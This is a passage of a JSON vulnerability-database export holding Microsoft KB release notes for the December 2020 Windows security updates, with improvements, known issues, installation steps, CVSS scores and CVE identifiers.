\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4592484 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T08:00:00", "id": "KB4592484", "href": "https://support.microsoft.com/en-us/help/4592484", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T14:05:59", "description": "None\n**NEW 8/5/21 \nEXPIRATION NOTICE****IMPORTANT **As of 8/5/2021, this KB is no longer available from Windows Update, the Microsoft Update Catalog, or other release channels. We recommend that you update your devices to the latest security quality update. \n\n**NEW 12/8/20 \nIMPORTANT **Adobe Flash Player will go out of support on December 31, 2020. For more information, see [Adobe Flash end of support on December 31, 2020](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support#:~:text=Adobe%20will%20end%20support%20of,site%2Dby%2Dsite%20basis.>). 
Flash content will be blocked from running in Flash Player beginning January 12, 2021. For more information, see [Adobe Flash Player EOL General Information Page](<https://www.adobe.com/products/flashplayer/end-of-life.html>).\n\n**UPDATED 12/8/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1507 update history home page.\n\n## Highlights\n\n * Updates to improve security when using Microsoft Office products.\n * Updates an issue that prevents the PDF24 app, version 9.1.1, from opening .txt files.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue that prevents the PDF24 app, version 9.1.1, from opening .txt files.\n * Security updates to the Microsoft Graphics Component and Windows Media.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. 
This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends that you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB4565911) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4592464>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4592464](<https://download.microsoft.com/download/6/6/5/665e19b3-ba77-4a37-aa12-0fb46cc45ced/4592464.csv>). 
\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4592464 (OS Build 10240.18782) - EXPIRED", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T08:00:00", "id": "KB4592464", "href": "https://support.microsoft.com/en-us/help/4592464", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T14:05:59", "description": "None\n**NEW 12/8/20 \nIMPORTANT **Adobe Flash Player will go out of support on December 31, 2020. For more information, see [Adobe Flash end of support on December 31, 2020](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support#:~:text=Adobe%20will%20end%20support%20of,site%2Dby%2Dsite%20basis.>). Flash content will be blocked from running in Flash Player beginning January 12, 2021. 
For more information, see [Adobe Flash Player EOL General Information Page](<https://www.adobe.com/products/flashplayer/end-of-life.html>).\n\n**IMPORTANT** Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).\n\nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4586834](<https://support.microsoft.com/help/4586834>) (released November 10, 2020) and addresses the following issues:\n\n * Addresses an issue in which PDF24 Creator version 9.1.1 cannot open .txt files.\n * Security updates to Windows Graphics, Windows Peripherals, and Windows Core Networking.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. 
This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB4566426](<https://support.microsoft.com/help/4566426>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4592468>) website. 
\nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for update 4592468](<https://download.microsoft.com/download/a/9/e/a9eb1736-3a9b-47c5-a099-6c0e28deec03/4592468.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4592468 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T08:00:00", "id": "KB4592468", "href": "https://support.microsoft.com/en-us/help/4592468", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T14:06:00", "description": "None\n**IMPORTANT **Verify that you have installed the required updates listed in the **How to get this update** section _before_ installing this update. 
\n\nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 SP1 and Windows Server 2008 R2 SP1 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4586827](<https://support.microsoft.com/help/4586827>) (released November 10, 2020) and addresses the following issues:\n\n * Security updates to Windows Graphics, Windows Peripherals, Windows Storage and Filesystems, and Windows File Server and Clustering.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom **| **Workaround ** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. 
\nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following: \n\n * Perform the operation from a process that has administrator privilege. \n * Perform the operation from a node that doesn\u2019t have CSV ownership. \nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **_restart your device_** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). 
To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter you install the items above, we strongly recommend that you install the _latest_ SSU ([KB4592510](<https://support.microsoft.com/help/4592510>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). 
For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4592471>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4592471](<https://download.microsoft.com/download/8/9/3/893b74d6-697d-4b96-ab07-845663edc238/4592471.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4592471 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T08:00:00", "id": "KB4592471", "href": "https://support.microsoft.com/en-us/help/4592471", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T14:06:02", "description": "None\n**NEW 8/5/21 \nEXPIRATION NOTICE****IMPORTANT **As of 8/5/2021, this KB is no longer available from Windows Update, the Microsoft Update Catalog, or other release channels. We recommend that you update your devices to the latest security quality update. \n\n**NEW 12/8/20 \nIMPORTANT **Adobe Flash Player will go out of support on December 31, 2020. For more information, see [Adobe Flash end of support on December 31, 2020](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support#:~:text=Adobe%20will%20end%20support%20of,site%2Dby%2Dsite%20basis.>). Flash content will be blocked from running in Flash Player beginning January 12, 2021. For more information, see [Adobe Flash Player EOL General Information Page](<https://www.adobe.com/products/flashplayer/end-of-life.html>).\n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). 
To view other notes and messages, see the Windows 10, version 1607 update history home page.\n\n## Highlights\n\n * Updates to improve security when using Microsoft Office products.\n * Updates an issue that prevents the PDF24 app, version 9.1.1, from opening .txt files.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue that prevents the PDF24 app, version 9.1.1, from opening .txt files.\n * Security updates to the Microsoft Graphics Component, Windows Media, Windows Fundamentals, and Windows Virtualization.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing KB4467684, the cluster service may fail to start with the error \u201c2245 (NERR_PasswordTooShort)\u201d if the group policy \u201cMinimum Password Length\u201d is configured with greater than 14 characters.| This issue is resolved in KB4601318. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). 
SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB4576750) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4593226>) website. 
\nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4593226](<https://download.microsoft.com/download/b/f/9/bf9f9ea6-7185-4cfc-9628-7e549d98fd45/4593226.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4593226 (OS Build 14393.4104) - EXPIRED", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T08:00:00", "id": "KB4593226", "href": "https://support.microsoft.com/en-us/help/4593226", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-12-31T15:44:40", "description": "None\n**IMPORTANT **Verify that you have installed the required updates listed in the **How to get this update** section _before_ installing this update. 
\n\n**IMPORTANT** WSUS scan cab files will continue to be available for Windows Server 2008 SP2. If you have a subset of devices running this operating system without ESU, they might show as _non-compliant_ in your patch management and compliance toolsets.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Security updates to Windows Graphics and Windows Peripherals.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. 
This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of this OS must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information on ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **_restart your device_** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. 
For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, we strongly recommend that you install the _latest_ SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).\n\n**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB4586768](<https://support.microsoft.com/help/4586768>)).\n\n**Install this update**\n\n**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4592504>) website. 
\nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows: **Product**: Windows Server 2008 Service Pack 2; **Classification**: Security Updates \n\n**File information**\n\nFor a list of the files that are provided in this update, download the [file information for cumulative update 4592504](<https://download.microsoft.com/download/4/8/3/4831732e-18bd-4b57-a883-4b87c74aecda/4592504.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "December 8, 2020\u2014KB4592504 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17098"], "modified": "2020-12-08T08:00:00", "id": "KB4592504", "href": "https://support.microsoft.com/en-us/help/4592504", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T14:06:01", "description": "None\n**IMPORTANT** Verify that you have installed the required updates listed in the **How to get this update** section _before_ installing this update. 
\n\nFor more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2008 Service Pack 2 update history [home page](<https://support.microsoft.com/help/4343218>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4586807](<https://support.microsoft.com/help/4586807>) (released November 10, 2020) and addresses the following issues:\n\n * Addresses an issue in which PDF24 Creator version 9.1.1 cannot open .txt files.\n * Security updates to Windows Graphics and Windows Peripherals.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. 
